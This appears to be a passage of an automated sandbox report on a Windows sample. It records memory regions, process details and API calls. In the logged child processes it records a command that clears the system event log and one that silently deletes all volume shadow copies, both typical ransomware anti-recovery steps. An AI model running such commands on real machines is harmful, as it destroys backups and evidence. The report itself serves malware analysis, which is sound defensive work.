0x7ff6c3f6efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6d000" filename = "" Region: id = 600 start_va = 0x7ff6c3f6f000 end_va = 0x7ff6c3f6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6f000" filename = "" Region: id = 601 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 602 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 603 start_va = 0xbb28320000 end_va = 0xbb2841ffff entry_point = 0x0 region_type = private name = "private_0x000000bb28320000" filename = "" Region: id = 604 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 605 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 606 start_va = 0xbb281f0000 end_va = 0xbb281fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb281f0000" filename = "" Region: id = 607 start_va = 0xbb28200000 end_va = 0xbb28206fff entry_point = 0x0 region_type = private name = "private_0x000000bb28200000" filename = "" Region: id = 608 start_va = 0xbb28270000 end_va = 0xbb282affff entry_point = 0x0 region_type = private name = "private_0x000000bb28270000" filename = "" Region: id = 609 start_va = 0xbb282b0000 end_va = 0xbb282b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb282b0000" filename = "" Region: id = 610 start_va = 0xbb282c0000 end_va = 0xbb282c6fff entry_point = 0x0 region_type = private name = "private_0x000000bb282c0000" filename = "" Region: id = 611 start_va = 0xbb282d0000 end_va = 0xbb282d0fff entry_point = 0x0 region_type = private name = "private_0x000000bb282d0000" filename = "" Region: id = 612 start_va = 0xbb282e0000 end_va = 0xbb282e0fff entry_point = 0x0 region_type = private name = "private_0x000000bb282e0000" filename = "" Region: id = 613 start_va = 0xbb28420000 end_va = 0xbb284ddfff entry_point = 0xbb28420000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 614 start_va = 0xbb28620000 end_va = 0xbb2862ffff entry_point = 0x0 region_type = private name = "private_0x000000bb28620000" filename = "" Region: id = 615 start_va = 0xbb28630000 end_va = 0xbb287b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb28630000" filename = "" Region: id = 616 start_va = 0xbb287c0000 end_va = 0xbb28940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb287c0000" filename = "" Region: id = 617 start_va = 0xbb28950000 end_va = 0xbb29d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bb28950000" filename = "" Region: id = 618 start_va = 0x7ff6c3e40000 end_va = 0x7ff6c3f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3e40000" filename = "" Region: id = 619 start_va = 0x7ff6c3f6b000 end_va = 0x7ff6c3f6cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3f6b000" filename = "" Region: id = 620 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 621 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 622 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 623 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 624 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 625 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 626 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 627 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 628 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 629 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 630 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 631 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 27 os_tid = 0x200 Thread: id = 28 os_tid = 0x7d0 Thread: id = 29 os_tid = 0x244 Process: id = "13" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x1dc19000" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb2c" cmd_line = "wevtutil cl system" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 645 start_va = 0xac0000 end_va = 0xaeefff entry_point = 0xac0000 region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 646 start_va = 0xf20000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 647 start_va = 0x4f20000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 648 start_va = 0x4f40000 end_va = 0x4f41fff entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 649 start_va = 0x4f50000 end_va = 0x4f63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f50000" filename = "" Region: id = 650 start_va = 0x4f70000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 651 start_va = 0x4fb0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 652 start_va = 0x4ff0000 end_va = 0x4ff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ff0000" filename = "" Region: id = 653 start_va = 0x5000000 end_va = 0x5000fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005000000" filename = "" Region: id = 654 start_va = 0x5010000 end_va = 0x5011fff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 655 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 656 start_va = 0x7edf0000 end_va = 0x7ee12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 657 start_va = 0x7ee1b000 end_va = 0x7ee1dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee1b000" filename = "" Region: id = 658 start_va = 0x7ee1e000 end_va = 0x7ee1efff entry_point = 0x0 region_type = private name = "private_0x000000007ee1e000" filename = "" Region: id = 659 start_va = 0x7ee1f000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee1f000" filename = "" Region: id = 660 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 661 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 662 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 663 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 664 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 665 start_va = 0x50a0000 end_va = 0x50affff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 666 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 667 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 668 start_va = 0x5190000 end_va = 0x528ffff entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 669 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 31 os_tid = 0x488 Thread: id = 32 os_tid = 0xb30 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xa853000" os_pid = "0x764" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c vssadmin.exe Delete Shadows \\/All \\/Quiet" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 670 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 671 start_va = 0x970000 end_va = 0x496ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 672 start_va = 0x4970000 end_va = 0x498ffff entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 673 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 674 start_va = 0x49a0000 end_va = 0x49b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049a0000" filename = "" Region: id = 675 start_va = 0x49c0000 end_va = 0x49fffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 676 start_va = 0x4a00000 end_va = 0x4afffff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 677 start_va = 0x4b00000 end_va = 0x4b03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 678 start_va = 0x4b10000 end_va = 0x4b10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 679 start_va = 0x4b20000 end_va = 0x4b21fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 680 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 681 start_va = 0x7f350000 end_va = 0x7f372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f350000" filename = "" Region: id = 682 start_va = 0x7f37b000 end_va = 0x7f37bfff entry_point = 0x0 region_type = private name = "private_0x000000007f37b000" filename = "" Region: id = 683 start_va = 0x7f37c000 end_va = 0x7f37cfff entry_point = 0x0 region_type = private name = "private_0x000000007f37c000" filename = "" Region: id = 684 start_va = 0x7f37d000 end_va = 0x7f37ffff entry_point = 0x0 region_type = private name = "private_0x000000007f37d000" filename = "" Region: id = 685 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 686 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 687 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 688 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 689 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 690 start_va = 0x4cf0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 691 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 692 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 693 start_va = 0x4ea0000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 694 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 735 start_va = 0x4970000 end_va = 0x497ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 736 start_va = 0x4b30000 end_va = 0x4bedfff entry_point = 0x4b30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 737 start_va = 0x4bf0000 end_va = 0x4c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 738 start_va = 0x4d00000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 739 start_va = 0x5150000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 740 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 741 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 742 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 743 start_va = 0x7f250000 end_va = 0x7f34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f250000" filename = "" Region: id = 744 start_va = 0x7f378000 end_va = 0x7f37afff entry_point = 0x0 region_type = private name = "private_0x000000007f378000" filename = "" Region: id = 745 start_va = 0x4980000 end_va = 0x4983fff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 746 start_va = 0x4990000 end_va = 0x4993fff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 747 start_va = 0x5160000 end_va = 0x5496fff entry_point = 0x5160000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 33 os_tid = 0x438 [0095.651] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0095.651] __set_app_type (_Type=0x1) [0095.651] __p__fmode () returned 0x77ac4d6c [0095.651] __p__commode () returned 0x77ac5b1c [0095.651] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0095.651] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0095.652] GetCurrentThreadId () returned 0x438 [0095.652] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x438) returned 0x84 [0095.652] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0095.652] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0095.652] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.654] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.654] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4affd98 | out: phkResult=0x4affd98*=0x0) returned 0x2 [0095.654] VirtualQuery (in: lpAddress=0x4affd9f, lpBuffer=0x4affd50, dwLength=0x1c | out: lpBuffer=0x4affd50*(BaseAddress=0x4aff000, AllocationBase=0x4a00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.654] VirtualQuery (in: lpAddress=0x4a00000, lpBuffer=0x4affd50, dwLength=0x1c | out: lpBuffer=0x4affd50*(BaseAddress=0x4a00000, AllocationBase=0x4a00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0095.654] VirtualQuery (in: lpAddress=0x4a01000, lpBuffer=0x4affd50, dwLength=0x1c | out: lpBuffer=0x4affd50*(BaseAddress=0x4a01000, AllocationBase=0x4a00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0095.654] VirtualQuery (in: lpAddress=0x4a03000, lpBuffer=0x4affd50, dwLength=0x1c | out: lpBuffer=0x4affd50*(BaseAddress=0x4a03000, AllocationBase=0x4a00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0095.654] VirtualQuery (in: lpAddress=0x4b00000, lpBuffer=0x4affd50, dwLength=0x1c | out: lpBuffer=0x4affd50*(BaseAddress=0x4b00000, AllocationBase=0x4b00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0095.654] GetConsoleOutputCP () returned 0x1b5 [0095.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0095.655] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0095.655] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.655] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0095.655] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.655] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0095.655] _get_osfhandle (_FileHandle=1) returned 0x3c [0095.655] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0095.656] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.656] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0095.656] _get_osfhandle (_FileHandle=0) returned 0x38 [0095.656] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0095.656] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.656] FreeEnvironmentStringsA (penv="A") returned 1 [0095.656] GetEnvironmentStringsW () returned 0x4ea7d98* [0095.656] FreeEnvironmentStringsA (penv="A") returned 1 [0095.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4afecfc | out: phkResult=0x4afecfc*=0x94) returned 0x0 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0xa8, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x1, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0x1, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x0, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x40, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x40, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.656] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0x40, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.656] RegCloseKey (hKey=0x94) returned 0x0 [0095.657] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4afecfc | out: phkResult=0x4afecfc*=0x94) returned 0x0 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0x40, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x1, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0x1, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x0, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x9, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x4, lpData=0x4afed08*=0x9, lpcbData=0x4afed04*=0x4) returned 0x0 [0095.657] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4afed00, lpData=0x4afed08, lpcbData=0x4afed04*=0x1000 | out: lpType=0x4afed00*=0x0, lpData=0x4afed08*=0x9, lpcbData=0x4afed04*=0x1000) returned 0x2 [0095.657] RegCloseKey (hKey=0x94) returned 0x0 [0095.657] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29810 [0095.657] srand (_Seed=0x5ad29810) [0095.657] GetCommandLineW () returned="/c vssadmin.exe Delete Shadows \\/All \\/Quiet" [0095.657] GetCommandLineW () returned="/c vssadmin.exe Delete Shadows \\/All \\/Quiet" [0095.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0095.657] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4ea9cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0095.657] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0095.657] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0095.657] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0095.657] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 